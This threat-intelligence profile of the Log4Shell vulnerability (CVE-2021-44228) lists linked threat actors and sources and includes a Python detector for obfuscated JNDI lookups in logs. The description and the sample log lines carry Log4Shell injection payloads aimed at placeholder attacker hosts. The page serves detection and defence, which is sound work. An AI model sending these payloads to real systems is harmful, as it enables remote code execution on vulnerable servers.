CVE-2021-44228

Vulnerability updated 25 days ago (2024-08-14T09:36:36.482Z)
CVE-2021-44228, also known as Log4Shell, is a critical remote code execution flaw in the Apache Log4j 2 logging library (versions 2.0-beta9 through 2.14.1): when an attacker-controlled string such as ${jndi:ldap://<attacker-host>/x} is written to a log, Log4j's lookup substitution resolves it through JNDI and loads a class from the attacker's server. Disclosed in December 2021, it quickly became one of the most severe bugs of recent years because Log4j is embedded in a vast number of Java applications and the payload can be delivered through any logged field (a User-Agent header, a username, a search string). Various Advanced Persistent Threat (APT) actors attempted to exploit it against products such as ServiceDesk without success, while others, such as GOLD MELODY (UNC961), used it successfully to compromise servers such as MobileIron Core. Threat groups that have used Log4Shell include APT40, which is known for rapidly exploiting newly public vulnerabilities in widely used software and has also targeted Atlassian Confluence and Microsoft Exchange, and TellYouThePass, a ransomware group active since 2019 that has exploited this flaw alongside vulnerabilities in open-source web languages such as PHP. Despite being public for several years, CVE-2021-44228 remains one of the most common exploit attempts observed, especially against educational institutions, where it accounts for 74% of attempts; in that sector LockBit was responsible for 30% of ransomware incidents. The vulnerability continues to be of interest to both attackers and defenders, which is why prompt patching of known vulnerabilities, and an inventory of where Log4j is embedded, still matters.
Description last updated: 2024-08-14T09:06:03.754Z
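As an added example (not part of this page, and not code from the Apache Log4j project), the following Python checks the two things the description above leaves implicit for a defender: whether a logged string carries a JNDI lookup, including the common obfuscations that signature-only matching misses (nested ${lower:...} and ${upper:...} lookups, the ${name:-default} default-value trick, and URL encoding), and whether a reported Log4j version falls in the affected range. The resolver models only the subset of Log4j lookups attackers use to hide the string "jndi"; the version boundaries follow Apache's Log4j security advisory (2.0-beta9 through 2.14.1 affected, 2.12.2 and 2.3.1 shipped as backported fixes). The access-log lines are constructed samples, and the IP addresses and hostnames are reserved documentation values, not real indicators.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The resolved form every exploit attempt must reach: ${jndi:<scheme>:<target>}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^}\s]*)\}", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate one innermost lookup the way Log4j 2's substitutor would, for
    the subset attackers use to hide 'jndi'. Returns None for anything else,
    which is then left in place (including the jndi payload itself)."""
    if body.lower().startswith("jndi:"):
        return None
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> "j"
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":   # ${lower:J} -> "j"
        return arg.lower()
    if sep and name.lower() == "upper":   # ${upper:j} -> "J"
        return arg.upper()
    return None


def normalize(value: str, max_rounds: int = 16) -> str:
    """Undo URL encoding (up to twice) and nested lookups until stable."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded

    def repl(m):
        r = _resolve(m.group(1))
        return m.group(0) if r is None else r

    for _ in range(max_rounds):
        new = _INNER.sub(repl, value)
        if new == value:
            break
        value = new
    return value


def find_jndi(value: str):
    """Return (scheme, target) of the first JNDI lookup in value, else None."""
    m = _JNDI.search(normalize(value))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_log(lines):
    """Flag Log4Shell attempts anywhere in a log line (path, headers, UA).
    Returns a list of (line_number, scheme, target)."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, *found))
    return hits


_VER = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.IGNORECASE)
_PRE_RANK = {"beta": 0, "rc": 1, None: 2}   # pre-releases sort before final


def _parse(version: str):
    m = _VER.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch, pre, pre_n = m.groups()
    pre = pre.lower() if pre else None
    return (int(major), int(minor), int(patch or 0), _PRE_RANK[pre], int(pre_n or 0))


def is_vulnerable_version(version: str) -> bool:
    """CVE-2021-44228 affects Log4j 2.0-beta9 through 2.14.1 (per Apache);
    2.12.2 (Java 7) and 2.3.1 (Java 6) are backported fixes in older lines."""
    v = _parse(version)
    if not ((2, 0, 0, 0, 9) <= v <= (2, 14, 1, 2, 0)):
        return False
    _, minor, patch = v[:3]
    if minor == 12 and patch >= 2:
        return False
    if minor == 3 and patch >= 1:
        return False
    return True


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.20 - - [14/Aug/2024:09:00:01 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [14/Aug/2024:09:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - [14/Aug/2024:09:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.5%2Fx%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    '198.51.100.23 - - [14/Aug/2024:09:00:04 +0000] "GET / HTTP/1.1" 200 1024 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://evil.example/x}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup via {scheme} to {target}")
    for v in ("2.14.1", "2.12.2", "2.17.1"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "not affected")
```

Line 1 mentions "jndi" in a path but carries no lookup and is not flagged; lines 2 to 4 are flagged even though only line 2 contains the literal string ${jndi:, which is the point: match on the normalized form, not on the raw bytes. Note that a blocked attempt still tells you the host was probed, and a line-level hit says nothing about whether the target actually ran Log4j; the version check is the other half of that answer.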
Possible Aliases / Cluster overlaps
It is hard to track cluster overlaps and naming conventions between vendors, so here are some overlapping names / profiles you may also want to look at.
ID | Votes | Profile Description
Log4Shell | 11 | Log4Shell is a significant software vulnerability that exists within the Log4j Java-based logging utility. The vulnerability, officially designated as CVE-2021-44228, allows potential attackers to execute arbitrary code on targeted systems. Advanced Persistent Threat (APT) actors, including LockBit
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Log4j
Vulnerability
Exploit
Remote Code ...
Exploits
RCE (Remote ...
Apt
exploited
Ransomware
Confluence
Operation Bl...
Malware
Apache
Ofbiz
Associated Threat Actors
ID | Type | Votes | Profile Description
APT40 | Unspecified | 2 | APT40 is a China-attributed cyber espionage group known for targeting countries strategically significant to the Belt and Road Initiative. The group has been linked to at least 51 different code families, exhibiting a broad range of capabilities. APT40 typically employs spear-phishing emails, often
APT41 | Unspecified | 2 | APT41, a threat actor attributed to China, has been actively targeting organizations in at least 14 countries since 2012. The group is known for its use of an extensive range of malware, with at least 46 different code families and tools observed in their operations. They are associated with various
Associated Vulnerabilities
ID | Type | Votes | Profile Description
CVE-2021-34473 | Unspecified | 3 | CVE-2021-34473 is a significant software vulnerability that was discovered in Microsoft Exchange Server. This flaw, along with two others (CVE-2021-31207 and CVE-2021-34523), forms a chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to
CVE-2021-26084 | Unspecified | 3 | CVE-2021-26084 is a critical vulnerability in Atlassian Confluence Server and Data Center. It was exploited in the wild within days of its public disclosure in August 2021. It allowed unauthenticated remote attackers to execute code on a Confluence Server via OGNL injection atta
CVE-2021-34523 | Unspecified | 2 | None
CVE-2021-44207 | Unspecified | 2 | CVE-2021-44207 is a significant software vulnerability that was exploited by APT41, a prolific Chinese state-sponsored espionage group known for targeting both public and private sector organizations. This flaw in the USAHerds web application's design or implementation mirrors a previously reported
Proxyshell | Unspecified | 2 | ProxyShell is a series of vulnerabilities affecting Microsoft Exchange email servers. These flaws in software design or implementation have been exploited by threat actors to gain unauthorized access and control over targeted systems. The ProxyShell vulnerability, officially tracked as CVE-2021-3447
CVE-2021-31207 | Unspecified | 2 | CVE-2021-31207 is a Microsoft Exchange Server security feature bypass and the third link in the ProxyShell chain, alongside CVE-2021-34473 and CVE-2021-34523. It has been exploited by APT40, a group known for rapidly taking advantage of newly public vulnerabilities in widely used software; the same group has also targeted Atlassian Confluence and a
Source Document References
Information about the CVE-2021-44228 vulnerability was read from the documents corpus below. This display is limited to 20 results.
Source | Created | Title
CERT-EU | 8 months ago | A Log4Shell Malware Campaign in the DNS Spotlight
DARKReading | a month ago | Feds Warn of North Korean Cyberattacks on US Critical Infrastructure
CISA | a month ago | North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs | CISA
Securityaffairs | 2 months ago | Cybersecurity agencies warn of China-linked APT40's capabilities
CISA | 2 months ago | People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action | CISA
Securityaffairs | 2 months ago | ExCobalt Cybercrime group targets Russian organizations in multiple sectors
DARKReading | 3 months ago | TellYouThePass Ransomware Group Exploits Critical PHP Flaw
InfoSecurity-magazine | 4 months ago | Log4J Still Among Top Exploited Vulnerabilities, Cato Finds
DARKReading | 5 months ago | Getting Security Remediation on the Boardroom Agenda
CERT-EU | 6 months ago | What cyber threats face the education sector?
CERT-EU | 6 months ago | Cybersecurity crisis in schools - Help Net Security
CERT-EU | 7 months ago | Trustwave reveals cybersecurity threats targeting education sector
CERT-EU | 7 months ago | How CVSS 4.0 changes (or doesn't) the way we see vulnerability severity
CERT-EU | 7 months ago | Sensor Intel Series: Top CVEs in December 2023
BankInfoSecurity | 7 months ago | FritzFrog Botnet Exploits Log4Shell
Securityaffairs | 8 months ago | Experts created a PoC for Apache OFBiz flaw CVE-2023-51467
CERT-EU | 8 months ago | New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems
CERT-EU | 8 months ago | December 2023's Most Wanted Malware: The Resurgence of Qbot and FakeUpdates - Global Security Mag Online
CERT-EU | 8 months ago | Above 30% Apps at Risk with Vulnerable Log4j Versions
CERT-EU | 8 months ago | Breaking Cyber News From Cyberint - Cyberint